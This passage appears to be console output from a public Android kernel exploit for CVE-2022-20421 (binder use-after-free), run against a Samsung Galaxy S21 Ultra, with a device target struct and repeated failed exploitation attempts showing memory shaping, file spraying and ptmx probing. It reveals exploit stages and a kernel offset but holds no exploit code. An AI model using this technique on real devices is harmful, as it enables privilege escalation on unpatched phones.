the device power off
.name = "Samsung Galaxy S21 Ultra", // Qualcomm
.model = "SM-G998U",
.android_version = 12,
.android_security_patch.year = 2022,
.android_security_patch.month = 3,
.kernel_version = KERNEL_VERSION(5, 4, 86),
.ram_offset = 0x0,
==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[19384:19384] New binder client: A
[19385:19385] New binder client: B
[19386:19386] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish.
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 5)
Reading ptmx 0
Testing ptmx 1 (fd 6)
Reading ptmx 1
Testing ptmx 2 (fd 7)
Reading ptmx 2
Testing ptmx 3 (fd 8)
Reading ptmx 3
Testing ptmx 4 (fd 9)
Reading ptmx 4
Testing ptmx 5 (fd 10)
Reading ptmx 5
Testing ptmx 6 (fd 11)
Reading ptmx 6
Testing ptmx 7 (fd 12)
Reading ptmx 7
Testing ptmx 8 (fd 13)
Reading ptmx 8
Testing ptmx 9 (fd 14)
Reading ptmx 9
Testing ptmx 10 (fd 15)
Reading ptmx 10
Testing ptmx 11 (fd 16)
Reading ptmx 11
Testing ptmx 12 (fd 17)
Reading ptmx 12
Testing ptmx 13 (fd 18)
Reading ptmx 13
Testing ptmx 14 (fd 19)
Reading ptmx 14
Testing ptmx 15 (fd 20)
Reading ptmx 15
Testing ptmx 16 (fd 21)
Reading ptmx 16
Testing ptmx 17 (fd 22)
Reading ptmx 17
Testing ptmx 18 (fd 23)
Reading ptmx 18
Testing ptmx 19 (fd 24)
Reading ptmx 19
Testing ptmx 20 (fd 25)
Reading ptmx 20
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 544
[x] Found binder_proc's inner_lock offset: 544 (vuln_fd 68)
[graveyard_process] pid = 19714
[pipe_process:19715] Pinned to CPU 0
[pipe_process:19716] Pinned to CPU 1
[pipe_process:19717] Pinned to CPU 2
[pipe_process:19719] Pinned to CPU 4
[pipe_process:19718] Pinned to CPU 3
[pipe_process:19720] Pinned to CPU 5
[pipe_process:19722] Pinned to CPU 7
[pipe_process:19721] Pinned to CPU 6
[fd_master_process] pid = 19723
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:19803] 30000 files sprayed
[shaper_process:19802] 30000 files sprayed
[shaper_process:19799] 30000 files sprayed
[shaper_process:19801] 30000 files sprayed
[shaper_process:19800] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=19866
[timer_master_process] Wait for C to enter spin_lock()
[19867:19867] New binder client: A
[19869:19869] New binder client: C
[19868:19868] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
B: Finish.
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
[x] Finish spinning at spin_lock()
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[timer_master_process] Done.
[fd_master_process] pid = 20225
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:20310] 30000 files sprayed
[shaper_process:20307] 30000 files sprayed
[shaper_process:20308] 30000 files sprayed
[shaper_process:20306] 30000 files sprayed
[shaper_process:20309] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=20367
[timer_master_process] Wait for C to enter spin_lock()
[20368:20368] New binder client: A
[20377:20377] New binder client: C
[20369:20369] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish.
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[x] Waiting for timer threads
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 20721
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:20781] 30000 files sprayed
[shaper_process:20779] 30000 files sprayed
[shaper_process:20780] 30000 files sprayed
[shaper_process:20777] 30000 files sprayed
[shaper_process:20778] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=20883
[timer_master_process] Wait for C to enter spin_lock()
[20884:20884] New binder client: A
[20885:20885] New binder client: B
[20886:20886] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 21191
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:21257] 30000 files sprayed
[shaper_process:21255] 30000 files sprayed
[shaper_process:21254] 30000 files sprayed
[shaper_process:21253] 30000 files sprayed
[shaper_process:21256] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[21319:21319] New binder client: B
[timer_master_process] pid=21317
[21318:21318] New binder client: A
[timer_master_process] Wait for C to enter spin_lock()
[21320:21320] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
[timer_master_process] Done.
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 21650
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:21706] 30000 files sprayed
[shaper_process:21702] 30000 files sprayed
[shaper_process:21703] 30000 files sprayed
[shaper_process:21705] 30000 files sprayed
[shaper_process:21704] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=21833
[timer_master_process] Wait for C to enter spin_lock()
[21836:21836] New binder client: C
[21835:21835] New binder client: B
[21834:21834] New binder client: A
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Waiting for timer threads
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 22180
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:22239] 30000 files sprayed
[shaper_process:22236] 30000 files sprayed
[shaper_process:22235] 30000 files sprayed
[shaper_process:22237] 30000 files sprayed
[shaper_process:22238] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=22301
[timer_master_process] Wait for C to enter spin_lock()
[22304:22304] New binder client: C
[22302:22302] New binder client: A
[22303:22303] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[x] Waiting for timer threads
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 22604
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:22676] 30000 files sprayed
[shaper_process:22672] 30000 files sprayed
[shaper_process:22673] 30000 files sprayed
[shaper_process:22675] 30000 files sprayed
[shaper_process:22674] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=22766
[timer_master_process] Wait for C to enter spin_lock()
[22769:22769] New binder client: C
[22767:22767] New binder client: A
[22768:22768] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Waiting for timer threads
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 23091
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:23168] 30000 files sprayed
[shaper_process:23166] 30000 files sprayed
[shaper_process:23167] 30000 files sprayed
[shaper_process:23164] 30000 files sprayed
[shaper_process:23165] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=23234
[timer_master_process] Wait for C to enter spin_lock()
[23235:23235] New binder client: A
[23237:23237] New binder client: C
[23236:23236] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish.
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[x] Waiting for timer threads
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 23964
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:24040] 30000 files sprayed
[shaper_process:24036] 30000 files sprayed
[shaper_process:24037] 30000 files sprayed
[shaper_process:24038] 30000 files sprayed
[shaper_process:24039] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=24106
[timer_master_process] Wait for C to enter spin_lock()
[24107:24107] New binder client: A
[24109:24109] New binder client: C
[24108:24108] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads